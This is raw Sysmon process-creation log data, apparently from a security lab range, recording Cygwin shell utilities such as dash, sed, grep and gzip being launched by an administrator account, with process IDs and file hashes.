14:55:53.904{A8622C2F-53F9-6078-FB07-00000000AE01}3176C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.904{A8622C2F-53F9-6078-FC07-00000000AE01}1348C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-FA07-00000000AE01}5144C:\cygwin64\bin\dash.exe- 154100x800000000000000045549Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.896{A8622C2F-53F9-6078-FA07-00000000AE01}5144C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045537Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.888{A8622C2F-53F9-6078-F907-00000000AE01}5860C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-F807-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.880{A8622C2F-53F9-6078-F807-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.871{A8622C2F-53F9-6078-F707-00000000AE01}6076C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-F507-00000000AE01}1476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045496Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.863{A8622C2F-53F9-6078-F607-00000000AE01}3368C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-F307-00000000AE01}6240C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045494Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.863{A8622C2F-53F9-6078-F507-00000000AE01}1476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045479Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.855{A8622C2F-53F9-6078-F407-00000000AE01}2664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-F207-00000000AE01}6040C:\cygwin64\bin\dash.exe- 154100x800000000000000045478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.855{A8622C2F-53F9-6078-F307-00000000AE01}6240C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045466Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.848{A8622C2F-53F9-6078-F207-00000000AE01}6040C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045454Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.840{A8622C2F-53F9-6078-F107-00000000AE01}5220C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-F007-00000000AE01}1536C:\cygwin64\bin\dash.exe- 154100x800000000000000045444Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.832{A8622C2F-53F9-6078-F007-00000000AE01}1536C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045428Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.823{A8622C2F-53F9-6078-EF07-00000000AE01}5312C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-ED07-00000000AE01}5664C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045417Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.816{A8622C2F-53F9-6078-EE07-00000000AE01}5052C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-EB07-00000000AE01}6808C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045414Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.815{A8622C2F-53F9-6078-ED07-00000000AE01}5664C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045395Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.807{A8622C2F-53F9-6078-EC07-00000000AE01}6440C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-EA07-00000000AE01}5996C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045393Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.807{A8622C2F-53F9-6078-EB07-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045382Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.799{A8622C2F-53F9-6078-EA07-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045367Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.791{A8622C2F-53F9-6078-E907-00000000AE01}6852C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-E807-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.784{A8622C2F-53F9-6078-E807-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045345Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.775{A8622C2F-53F9-6078-E707-00000000AE01}5212C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-E507-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045330Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.767{A8622C2F-53F9-6078-E607-00000000AE01}616C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-E307-00000000AE01}2112C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045328Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.767{A8622C2F-53F9-6078-E507-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.758{A8622C2F-53F9-6078-E407-00000000AE01}7016C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-E207-00000000AE01}6748C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.758{A8622C2F-53F9-6078-E307-00000000AE01}2112C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045296Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.751{A8622C2F-53F9-6078-E207-00000000AE01}6748C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045284Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.743{A8622C2F-53F9-6078-E107-00000000AE01}3912C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-E007-00000000AE01}3136C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045274Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.735{A8622C2F-53F9-6078-E007-00000000AE01}3136C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045260Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.722{A8622C2F-53F9-6078-DF07-00000000AE01}5084C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-DD07-00000000AE01}3300C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045245Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.715{A8622C2F-53F9-6078-DE07-00000000AE01}6064C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-DB07-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045240Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.715{A8622C2F-53F9-6078-DD07-00000000AE01}3300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045229Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.707{A8622C2F-53F9-6078-DC07-00000000AE01}6032C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-DA07-00000000AE01}6268C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045222Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.707{A8622C2F-53F9-6078-DB07-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045209Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.698{A8622C2F-53F9-6078-DA07-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.690{A8622C2F-53F9-6078-D907-00000000AE01}4788C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-D807-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045187Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.683{A8622C2F-53F9-6078-D807-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.660{A8622C2F-53F9-6078-D707-00000000AE01}6196C:\cygwin64\bin\find.exe-----"C:\cygwin64\bin\find.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C17DC689E2E9C2AF759E7A3046DE8F1D,SHA256=77371827DA82B14D29999F738B77F53053833BE5C0257DC85E8A091ABB662789,IMPHASH=58AC74B0A7539EFE91A9196817FF689C{A8622C2F-53F9-6078-D607-00000000AE01}1844C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045165Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.653{A8622C2F-53F9-6078-D607-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045153Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.643{A8622C2F-53F9-6078-D507-00000000AE01}6884C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53F9-6078-D407-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045142Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.635{A8622C2F-53F9-6078-D407-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.626{A8622C2F-53F9-6078-D307-00000000AE01}4300C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53F9-6078-D207-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 